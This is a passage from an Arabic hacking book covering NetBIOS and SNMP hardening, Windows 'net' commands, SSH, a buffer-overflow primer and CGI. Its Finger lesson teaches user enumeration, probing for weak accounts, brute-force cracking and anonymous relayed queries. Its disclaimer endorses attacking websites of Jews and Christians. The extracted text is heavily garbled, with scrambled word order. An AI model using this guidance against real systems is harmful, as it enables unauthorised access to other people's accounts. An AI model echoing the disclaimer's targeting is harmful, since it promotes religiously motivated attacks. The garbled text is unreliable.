routersاعتقد الن اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى ال

انتهى،،،

"NETBIOS"

<ةةةةة ةة ةةةة ةةةة>

بعد قراءة هذا الموضوع ستكون قادر على

صد الجلسات الخالية• منع تعداد المستخدمين• SNMPمنع تعداد الـ•

الـ لصحاب الشبكات المهمة لن وهي مشكلة كبيرةNetBIOS على يوجد في العداد الفتراضي للويندوز اعتمادNetBIOS لها واجهات تداخل API لـ139 تعيد وترجع معلومات حول الهدف من خلل المنفذ TCPوفي الحالة ،

الفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ، وطبعا هذا يكون فيه خطرا قد يكون كبير عند استخدامه منNTمحترفين الولوج على أنظمة

ثم منTCP/IP على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص NetBIOSتستطيع أن تلغي كل خدمات Advanced ثم من التبويب WINSثم تعلم على الخيار الواضح في المثال التالي

54

Page 55: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وهي تحد بشكل كبيرRestrictAnonymous وهى تدعى فقد قدمت شركة مايكروسوفت حل مناسبا وإذا كانت هذه الخدمة مهمة لك Local Security ثم من Administrative TOOLSمن تسرب المعلومات عبر الوصلت المجهولة ، وتستطيع الوصول إليها من

policyثم من النافذة نختار Local poicies ثم من security optionsثم نعلم على الخيار الول Additional restrictions for anonymous connections ثم بالزر اليمن نختار securityثم من النافذة نختار من الشريط المنزلق الخيار No Access

Without Explicit Anonymous Permissions مثل المثال

NetBIOSبعض المثله لستخدام أدوات الـ

Net View

وهي تعرض الميادين المتاحة وكل الجهزة علىNT/W2000هذه الداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على أو اسم الدومين حتى تكون قد حصلت على ماIP ، ويكفي أن تكتب عنوان هذه الميادين وكل الخدمات المتاحة لتشارك على الجهزة

تريد

في إدارةNetولمعرفة المزيد عن إستخدامات المر الشبكة انقر .

وهي أيضا اداة سطرNbtscanوتوجد بعض الدوات المتاحة على النترنت تقوم بنفس العمل بشكل احترافي منها هذه الداة المدعوه أوامر وتستطيع أن تحملها من ...

ولمشاهدة شرح ميسر من ...

، Legionوتوجد أدوات رسومية شعبية كثيرة على النترنت للقيام بنفس العمل منها على سبيل المثال البرنامج

الحل المريح

55

Page 56: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

إلى135 عبر المنافذ من UDP و البروتوكول TCPالحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول ، وشاهدنا كيف نلغي بالمنافذ بشكل مريح ، وكل برامج الجدران النارية المتقدمة تستطيع من خللها أن تتحكم445+ 139المنفذ

SNMP ورغم كل ذلك لزال الخطر موجودا إذا كنت تستخدم البروتوكول ، أو نقلل من المشاكل المحتمله منهاNetBIOSالخدمة سيرفر ، فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ، ولتأمين هذا البروتوكول بالشكل2000لدارة الشبكة على ويندوز

المطلوب أمامك خيارين الول

كما في المثال التي تكون عند التثبيت الفتراضي وتكون أسماء مخصصة من مستخدمين الشبكةPublic المجموعة حذف اسم Send authentication trap ثم حرر المربع Remove موجودة علم عليها ثم من الزر publicالمجموعة

بذلك تكون قد حصرت استخدام هذا البروتوكول للشخاص المختارين فقط

regeditوالحل الثاني من محرر السجل

HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent

ثم قم بإعادة ترقيم المدخلت مثل إ ذا كان ما حذفته رقمه = واحد أعد الترقيم LANManagerMIB2Agentثم قم بحذف المفتاح 2ليبدأ من واحد للمدخل رقم

هل تعلم أن ، لذلك إذا كنتNetBIOS يستطيع العمل بشكل سليم بدون خدمات الـTCP/IPالبروتوكول

غير محتاج إليه تعطيله أفضل

ةةةةةةةة

56

Page 57: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"Finger بروتوكول خدمة "

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة>

>LAMeR <ةةةةةة:

السلم عليكم ورحمة ال وبركاته 79 التي تعمل على بورت Finger اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة

بسم ال نبدأ الدرس

فهرس محتويات الدرس<================>

تبرئة1.1Finger مقدمة عن 1.2Finger استخدام 1.3Finger بعض الخدع عند استخدام خدمة 1.4Finger الستعلم عن طريق موقع بأستخدام 1.5 الستنتاج من هذا الدرس1.6 الختام1.7

تبرئة:1.1<=========>

هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين فالكاتب ل يتحمل اي مسؤولية للستخدام السيء لهذا الدرس ضد أخواننا المسلمين.

Finger مقدمة عن 1.2<===================>

عادة وكانت79 ديمون خدمة تعمل عن طريق البورت Fingerإن رقمي للناس.businesscardمستخدمة أصل كنوع

ديمون يجري على نظام معينFinger ) يمكن أن يرسل طلب إلى remote userالمستخدم البعيد() وسيحصل على إجابة.79 نوعية Finger(بورت

هذه الجابة ستخبرك من هم المستخدمين على هذا النظام و أيضابعض المعلومات عن هؤلء المستخدمين المتصلين بالنظام.

57

Page 58: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

) وكيف قامadminإضافة إلى هذه المعلومات, في أغلب الحيان الجابة تخبرك أيضا من الذي يدير النظام(بالتصال.

قديما استخدم الناس التصال على جميع انواع النظمة في العالم وطلب الستعلم عن هذه النظمة و الـFinger كان يعطيهم معلومات عن

يستخدم قديما فيFingerمن هم الموجودون في النظام وهل لهم حسابات في هذا النظام.وكانالجامعات و الشركات الكبيرة أيضا.

إستعمل عامة عن طريق الطلب في الجامعات Fingerفي الماضي ، الـ اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه

! " اي "أعلمني ! "Finger me ) بجملة " Finger Deamonوكثيرا ما تكون الجابة (اجابة Fingerأما الن ومع وجود شبكة النترنت العالمية اصبح

أقل شهرة ، لنه توجد الن ) رقمية خاصة بمستخدمين النترنت وبسبب ملحظةbisinesscardمواقع الويب للعمل كبطاقة عمل(

الناسFinger Deamonالتهديد الواسع للمن اللكتروني قل استخدام خدمة

على أية حال،ليس كل النظمة منعت هذه الخدمة وستجد بعض المواقع ( النظمة) تقدم هذه الخدمة.

وهذه اليام يقوم الهكرز بمحاولت اختراق النظمة بأستخدام برامج portscans. للبحث عن البورتات المفتوحة. . . بدون أي أساس علمي

ديمون، مثال عظيم لخدمةFingerلذلك إن يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الحساسة

حول هدف.لهذا سوف أحاول ان اشرح في هذا الدرس بلغة مفهومة

ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك Fingerما هو

كانت قديما ولزالت تستخدم لجلب المعلومات عن Fingerالخلصة المقدمة: ان خدمة المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ل .

) هو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع serverملحظة : النظام(

Finger استخدام 1.3<=================>

) للبحث superscanعند استخدام اي من برامج السكان المعروفة مثل ( مفتوحا79 بورت) Port ) ووجدت به منفذ (/http://www.foobar.comفي موقع معين (مثل

/http://www.foobar.comهذا يعني ان ديمون يعمل.Fingerله

) طلب استعلم؟ requestالن كيف نقوم بـ(عن طريق وندوز

) installed مركب ( Finger) خاص للـ clientفي أغلب الحيان وندوز ل يوجدبه زبون (

Finger كخادم لـ Telnetلذلك سوف نستخدم

--توضيح--Telnet(client) --------request-------> Finger Deamon(in Server) o

) :MS DOSعن طريق كتابة السطر التي في موجة الدوس (

telnet http://www.foobar.com/ 79

58

Page 59: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

و منه تطبع الوامر . telnetبعد ذلك سيظهر لك برنامج

اما من يونيكس Finger)خاص بخدمة clientلسنا بحاجة إلى أن نستعمل تيلنت لنه يوجد بنظام لينوكس زبون(

Deamon مركب على النظام بشكل دائم تقريبا.

ملحظة ::: سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الستمرار بأستخدام وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة الوامر نفسها الوامر التي

" في الوندوز مراعيا اسم الموقع wwwتنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم مثل يكون كتابة الوامر في لينوكس هكذا :

[email protected] ولكن في وندوز سيكون هكذا :

finger http://www.anyname.com/ www و fingerلحظ المسافة بين

) :unix shellاطبع في محث الوامر في يونكس ( على افتراض انك تستخدم

[email protected] لحظ ان الهدف (الموقع المرادالستعلم عنه مثل معرفة من هم مستخدمينه ) هنا هو

http://www.foobar.com/كمثال

فستظهرالنتائج:

Login: Name: Tty: Idle: When: Where:

root foobar sys console 17d Tue 10:13 node0ls3.foobar.comAmos Amanda<.......> <.......> <.......>

Anderson KennethBright Adrian

Doe JohnJohnson Peter<.......> <.......> <.......> Mitnick KevinMunson GregOrwell Dennis

الن ماذا تعني هذه النتائج؟) "السماء الحقيقية"،Name )نرى أسماء المستعملين وفي الثاني (loginفي العمود الول (

التي بالطبع ليست حقيقية، لكن في معظم الوقت حقيقة.

the terminal type)النوع الطرفي Ttyيرينا العمود الثالث (.the idle time) فترة التوقفIdleوالرابع (

وبعد ذلك في العمودين الخامس والسادسالوقت والمكان الذي استخدم فيه الحساب للتصال بالنظام.

أحيانا توجد أعمدة بعنواوين اليميلت وأرقام هواتف ..الخ الخاصة بمستخدمين هذا النظام

بيتر جونسنJohnson Peterإذا كنت تريد المزيد من المعلومات عن مستخدم معين (

59

Page 60: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

على سبيل المثال) أدخل المر التالي:

finger [email protected]

Finger بعض الخدع عند استخدام خدمة 1.4========================= >

<===========

.Fingerأتمنى الن شاهدت ما الضعف الرئيسي لخدمة Finger deamon.يريك ماهي الحسابات الموجوده على النظام

% من المجموعة السحرية وهي50هذا يعني أنك تكسب (عن طريق قانوني ) )إلى نظام. Accessكلمات السر/مجموعة أسماء المستخدمين التي ستمنحك الدخول (

أوbruteforceإذا عرفت أسماء المستخدمين، ستكون الخطوة القادمة متوقفه على برنامج worldist password crackerبمعنى آخر برامج تخمين الباسوورد

هناك سكربتات خاصة كتبت للتيلنت على سبيل المثال أو ابحث عن /http://www.thehackerschoice.comاذهب لموقع

VLAD's pwscan.pl

او المفكره) wordلذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي (وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة

-أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة bruteforceاستخدم برنامج وتجعل البرنامج يعمل عمله-

بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات.) بسبب انه عندما تعرف الباسوورد الخاص بهم root) أو الجذر(Adminوخاصة حساب الدارة (

وقتها تستطيع التحكم بالموقع . وبالطبع بعض الحسابات سهلة تخمين كلمة السر .هناك بعض الخدع لمعرفة هذا النوع من الحسابات. على سبيل المثال

إطبع المر:

finger [email protected]

سيعطيك جميع الحساباتFinger Deamonعندما ترسل هذا المر الي " أما في اسم المستعمل أو السم الحقيقي.secretالتي تحتوي على كلمة "

"0000" أو "temp" أو "testاذا، ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "" وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات secretبدل من "

سهل معرفة باسوورداته في أغلب الحيان.

finger [email protected]

finger [email protected]

جرب هذه الوامر وشاهد ما يحدث! وأوجد خدعك بنفسك!RFC، أقرأFinger Deamonحاول التعرف على

Finger الستعلم عن طريق موقع بأستخدام 1.5========================= >

60

Page 61: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<=============

كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم")Finger (معنى Fingerإذا أردت ان استخدم خدمة "www.victim.comوالستعلم عن موقع معين مثل هذا"

تعمل،Finger" يقدم خدمة www.host.comوأيضا تعرف أن موقع آخر "عندها يمكنني ان أقدم طلبا مثل هذا:(اكتب في محث الوامر مثل هذا)

[email protected]@victim.com

Host.com) يستعلم Finger الن (victim.com .ويريك النتائج victim.comأحدالفوائد من هذه الطريقة انك ستكون مجهول لدى

/http://www.victim.comفعندما تقوم في سجلتهم، بدل منك ./http://www.host.com) ستشاهد logبطلب سجل (الدخول

)بالستعلم عنFinger (موقع) يقوم ( عن طريق خدمة Hostفائدة اخرى وهي أنك يمكن ان تترك حاسوبا

من جهازكFingerآخرا على نفس الشبكة ، بينما اذا طلبت انت هذا الستعلم بأستخدام خدمة لن تكون مسموحة لك لنك سأكون غير موثوق به لدى المستعلم عنه

عن طريق موقع .Fingerبعكس اذا كان الطلب للستعلم باستخدام

يعني الخلصة : ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس اذا كان الستعلم عن طريق موقع اخر يشابهه فسوف يسمح له !.

الستنتاج من هذا الدرس1.6<=======================>

Finger Deamonيمكن أن يكون مصدر معلومات ضخم لي واحد يحاول ) إلى نظام.accessكسب الدخول(

Finger deamonقانونيا يزودك بنصف كلمات السر واسماء المستخدمين .accessالتي تحتاجها لكسب الدخول

هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها.bruteforce أو wordlistمن معرفتك لهذه الحسابات تستطيع كسر الباسووردات ، بإستعمال تقنية

.Finger deamonتذكر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال

انتهى،،،

61

Page 62: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"NET" شرح مختصر لدارة الشبكة بإستخدام المر

<ةةةةة ةة ةةةة ةةةة>

. تملكnetتستخدم العديد من الخدمات أوامر شبكة التصال التي تبدأ بالكلمة هذه بعض الخصائص المشتركة:netأوامر

المتوفرة بكتابة netيمكنك مشاهدة قائمة بكافة أوامر

net /?في موجه الوامر.

عن طريقnetيمكنك الحصول على تعليمات بناء الجملة في سطر الوامر لمر في موجه الوامر. على سبيل المثال، للحصولnet help commandكتابة

، اكتب مايلي: net accountsعلى تعليمات المر net help accounts

خيارات سطر الوامر netتقبل كافة أوامر

/y (نعم) و

/n(ل). على سبيل بتأكيد رغبتك في إيقاف كافة خدماتnet stop serverالمثال، يطالبك المر

، عن طريق الجابة بنعمnet stop server /yالملقم التابعة، بينما يتجاوز تلقائيا، المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم.

إذا كان اسم الخدمة يحتوي على فراغات، استخدم علمات القتباس حول النص net"). على سبيل المثال، يشغل المر التالي خدمة Service Name(أي، "

logon :net start "net logon"

يوما. 90 يوما)، والقيمة الفتراضية هي 49,710 يكافئ unlimited يوما (أي أن

62

Page 63: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

أقل من اثنين، يتم تحذير المستخدمين بتسجيل الخروج من شبكة التصال فورا.

63

Page 64: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

64

Page 65: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الوصف

قائمة بالملفات المفتوحة على الملقم.

net file /close لزالة التأمين وإغلق الملف. إن إخراج net file :مشابه لمايلي

65

Page 66: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

المجموعات التي تتضمن مستخدمين ومجموعات بآن واحد بالعلمة النجمية (*).

66

Page 67: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

67

Page 68: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

).Sales\Ralphrافصل الدخالت المتعددة باستخدام فراغات. يمكن أن تكون السماء عبارة عن مستخدمين محليين، أو مستخدمين على المجالت الخرى، أو مجموعات عمومية، لكن ل يمكن أن تكون من المجموعات المحلية الخرى. إذا كان المستخدم من مجال آخر، استهل اسم المستخدم باسم المجال (على سبيل المثال،

68

Page 69: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

"secure shellالـشرح "

<ةةةةة ةة ةةةةةةة ةةة ةةة>

>ACID BURN_EG: <ةةةةةة

السلم عليكم و رحمه ال و بركاته : اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على النترنت و

::SSh اى ال Secure Shellهذه الداه هى ال

69

Page 70: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

و لنبدأ الن الحديث عنها ::

؟SShما هى ال ===============

هى اداه (برنامج) للتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذsecure shellال و تستخدمremotely connectionاوامر او مهام معينه داخل هذا الجهاز اى و هو التصال عن بعد

ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات التصال الغير rlogin,rsh andامنه و هى تعتبر كبديل جيد جداا لدوات تستعمل لنفس الغرض فى يونكس مثل (

rcp.( كونيكشن .tcp اتصال امن جداا لشحنات اتصالت ال secure shellو تقدم ايضا ال

و هنا يأتى سؤال مهم :: و السؤال هو ::

فىr- commands على الدوات الخرى التى يطلق عليها secure shellلماذا يفضل استخدام ال يونكس ==================================================

======================================كالمذكورين فى العلى ؟

====================== مثل (r- commands تتعرض الدوات التى يطلق عليها BSDفى توزيعات اليونكس مثل ال *

rlogin,rsh and rcpالى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت ( ) للجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اىroot accessاكسيس (

ريموتلى يمكنه ان يدخل الى كل بيانات الجهزه التى على الشبكه بدون ادنى صعوبه لنه يستطيع بالروت اكسس ان يعبر من خلل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و

اعتقد انكم فهمتونى الن وunauthorized access to systemsهذا ما يسمى بأن الشخص لديه يمكن ايضا لى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلل شبكتك و تكون هذه

الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك

ملحوظه: طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الختراق و تستخدم فى اختراق المنظماتالكبرى و تقع تحت بند تقفى الثر و العداد للختراق )

و الن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الدوات فى يونكس فالسيكيور شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ل يعطيه الحق للدخول

فى هذه النقطه و بذلك حتى لو تمكنsshالى بيانات اجهزه الشبكه ال بالباسورد و ل يمكن التحايل على الالشخص من اكتساب الروت اكسس لن يستطسع الطلع على بيانات الشبكه

.authorized access to systemsال ب

و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لن السيكيور شيل ل يرسل الباسوردات فى

صوره واضحه كما ترسلها ادوات يونكس الخرى و لكن يرسلها مشفره و لذلك سيكون على المخترقمحاوله فك الشفره و الخ

من الثغرات و لكن تعتبر ثغراته قليل و تقريباsecure shellو لكن مع كل هذه المزايا لم يخلى ال معظمها يحتاج الى الرووت اكسس و الخرى يمكن ان تخترق السيكيور شل فقط بها (هذا كلم بينى و بينكم)

و الن سؤال اخر ::

؟sshما هى انواع الهجوم التى تحمى منها ال

70

Page 71: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

=========================================== اى تحمى من انتحال عنواين الى بى حيث انه لو ارسل شخص ماip spoofing- تحمى من ال 1

و تحمى ايضاsshباكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال .localy من المنتحلين على الشبكه المحليه اى sshال

DNS spoofing- تحمى مما يسمى ال 2

- تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس 3

- تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لى داتا مخزنه 4

ليس امن بدرجه كبيره حيث ان الشخاص ذو خبره كبيره فى النت وركsshو لكن مع كل هذا فأن ال و لكن ل يمكن ان يكسرو تشفيرdisconnected ينقطع عن التصال اى sshيستطيعون ان يجعلون ال

بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها .

و ايضا كل الشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها ,three-key triple-DES, DES, RC4-128 و هى تسمح بأكثر من نوع تشفير مثل (sshال

TSS, Blowfishيمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الداه تسمح لك بعدم ( و بهذا تجعلنى اقول عليك احمق ! لن هذا يجعلencryption of type "noneتشغيل التشفير اى"

سهله الختراق مثل الدوات التى تم ذكرها فى اول الموضوع فى يونكس , حيث ان هذا التشفيرsshال و هذا ايضا بالضافه الى تغيير مفاتيح فك التشفيرDNS spoofing و ال ip spoofingايضا يمنع ال

كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما .

اذن فهى اداه حقا مميزه و تستحق الحترام و الهتمام مع انها ل تخلو من الثغرات و لكن لنجعلها افضل ماموجود فى هذا المجال

ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسنظنكم.

انتهى،،،

"Buffer Overflows شرح معنى الـ"

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة>

>LAMeR <ةةةةةة:

.. وانشال تستفيدون منه Buffer Overflowsاقدم لكم درس يشرح ما معنى الـ

يله نبدأ

71

Page 72: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

محتويات الدرس:

؟Buffer Overflow- ما هو الـ 1--------------------------<

)Proccess- المعالجه(2-----------------<

)Memory management- إدارة الذاكره (3--------------------------------<

Buffer Overflow-استغلل ماذكر في الـ 4----------------------------------<

* ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟ ليس الكثير،،، فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب

وإدارة الذاكرة

؟Buffer Overflow-ما هو الـ 1>-----------------------<

Buffer Overflow.حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء ' ، التي أستغلتcode red تسمى فايروس 'Buffer Overflowاحدث ثغرة يمكنك أستغللها من نوع

-MS web server لمايكروسوفت -IISفي خادم 20 عندما يظهر برنامج ما متغير بحجم ثابت (على سبيل المثال،حجم Buffer Overflowعموما، يحدث

بايت) و القيمة التي خصصت إلى هذه المتغير أكبر من حجم المتغير.

خذ هذا المثال: يظهر برنامجي على الشاشة هذه الجملة: "رجاء إطبع اسمك الول: "ثم سيأخذ برنامجي من المستخدم

البيانات التي سيدخلها وهي (اسمه الول) ثم توضع في متغير فتظهر في برنامجي او تخزن. بايت والبيانات15المشكلة هنا تكمن في انه إذا كان المتغير مخصص لتخزين بيانات حجمها القصى يساوي

بايت التي ستخزن في المتغير (يتضح لنا ان اسم المستخدم وضع في25هنا(وهي اسم المستخدم)حجمها مكان اقل من حجمه ).

" على الذاكرة التيOverflow بايت من المؤكد انها سـ"تطفح 15اذن ماذا سيحدث للبيانات الزائدة عن خصصت لمتغير السم.

عندما يبدأ البرنامج، تخصص الذاكرة :>var1><var2><vname><Other things in memory<

10b 6b 15b )var 1و var 2, متغيرات ليست لها علقة بالسم المدخل vname بايت15 المتغير الذي حجمه

وهو الذي سيحتوي السم الذي سيدخله المستخدم)

abcabcabcabcabcabcabcabcaنفترض ان المستخدم سيدخل السم " bc:حينها ستبدو الذاكره هكذا "

somevalue2avalusabcabcabcabcabcabcabcabcabc

>var1 ><var2><vname ><other things go here<

" بسبب البيانات المدخلة عليه من قبل المستخدمoverflowed "طفح vnameاذا ماذا حدث ؟؟ المتغير

72

Page 73: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

)overflow أشياء اخرى في الذاكره" تغيرت بسبب فيض(other things in memoryو قيمة "الحروف من ادخال المستخدم.

اذن كيف أستغل هذا الخطأ؟؟؟ قبل أن نصل إلى الجواب، هناك بعض الشياء الساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية

الحاسوب .، لكن المفهوم مماثل لباقي النظمة.linuxفي هذه المقالة سنناقش نظام لينكس

):Proccess-المعالجه(2>----------------<

).في الحاسوب هنالكProccessإن الوحدة الوظيفية الساسية في حاسوب يعمل هي عملية المعالجه ( العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القوة التي تجعل العديد من العمليات تعمل في نفس

الوقت في الحاسوب. " صحيح... كيف اذن؟؛ ان وحدة المعالجةMulti- proccessesليس هناك شيء إسمه "متعددالعمليات

) تنتقل بين العمليات كل على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعملCPUالمركزية(في وقت واحد،

اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا :) .. كل عملية لها عنوان فاضي من الذاكره ، وليمكن لي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة.

وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو:

):Memory management-إدارة الذاكره (3>------------------------------<

(تخيلية). virtual memory-الحديثة ذاكرة افتراضية operating systemsتدير أنظمة التشغيل-ذلك يعني بأنه ليمكن لي تطبيق (برنامج مثل) الوصول مباشرة إلى الذاكرة الحقيقية.لماذا؟؟

تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الىOperating Systemانظمة التشغيل عناوين افتراضية(تخيلية)" .

(نظام التشغيل)بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ،يأخذ البرنامجOSوعندما تقوم ذاكرة الـ العنوان التخيلي فقط ، وليس العنوان الطبيعي.

و هنالك استخدام اخر للذاكرة الفتراضية(التخيلية) وهي انه من المعلوم أن الذاكرة الحقيقية ل ترتبط مباشرةبكل عملية (أو برنامج)، فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة،

والتطبيق ل يمكنه أبدا معرفة مكان الذاكرة ( مكان الذاكرة الحقيقة )،ذلك لن المساحة المخصصة للذاكرة فيالقرص الصلب تتبدل وتتغير.

توضيح :. ان الذاكرة ل تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ، حيث ان الذاكرة الحقيقة تمثل

مساحة معينة من القرص الصلب (ومكان هذه المساحة في تغير مستمر) لذلك سميت حقيقية او بمعنى اخرطبيعية (اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب)

وفائدة الذاكرة الفتراضية هي إعطاء عنوان افتراضي (غير حقيقي ) للذاكرة الحقيقية اي يعطي عنوان كأسم فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ، وإن تغير مكان المساحة المخصصة للذاكرة يظل

العنوان الفتراضي(التخيلي) ثابت.

Buffer Overflow-استغلل ماذكر في الـ 4>---------------------------------<

الن نصل إلى الجزء الهم والمرح

73

Page 74: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

) وأختراقRootكيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر ( النظام؟ تذكر نحن قلنا في وقت سابق بأنه عندما يكون الدخال(البيانات) من المستخدم أكبر حجما من الذاكرة

) في الذاكرة التي بعد السم المتغير؟ هذاoverflowالتي خصصت لهذه البيانات، البيانات الزائدة ستفيض (المكان من الذاكرة هو المكان الذي نستفيد منه في الختراق.

ماذا نعمل في ذلك المكان: داخل خط (مكان) البيانات التي يدخلها المستخدم (في المثال السابق وهو السم الول الذي يطلب من قبل البرنامج ثم أدخلناه ) نضع الوامر الكثر شعبية للحاسوب، حيث هذه الوامر تجعل الحاسوب يحدث(ينتج) هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغل. القيام بهذا

العمل ليس بيسطا كما يبدو لك، إذن لو أردت معرفة كيف يعمل ، أنت يجب أن تقرأ المقالة القادمة حولBuffer Overflowsالذي سيصف بالضبط كيف لستغلل واحده من الـ ،Buffer Overflowsفي

الختراق.

واللي فهم الدرس نصBuffer Overflowاخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى نص يعيد قرائته اكثر من مرة مع التدقيق وانشال يفهم.

انتهى،،،

وعلقتها بالنترنت "CGI" الـ

<ةةةةة>

>King_abdo:<ةةةةة ةة ةةة

و علقتها بالنترنتCGIفي هذا الملف سوف نقوم بعرض مقدمة الـ

74

Page 75: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

CGI) مقدمة للـ 1(

CGI=COMMON GATEWAY INTERFACEهي الواجهة التي تسمح بالتصال بين جانب المستخدم عن طريق المتصفح أو البرامج

)HTTPو خلفه و جانب الويب سيرفر الذي يفهم بروتوكول (

هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء التصال . البورتTCP/IPالـ المحددة

( من الممكن أن تتغير هذه البورت)80لهذا البروتوكول هي

تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلتمعينه يقوم

مبرمج السي جي أي بتحديدها

يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين :

- في الخطوة الولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له1

- في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس2

يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل

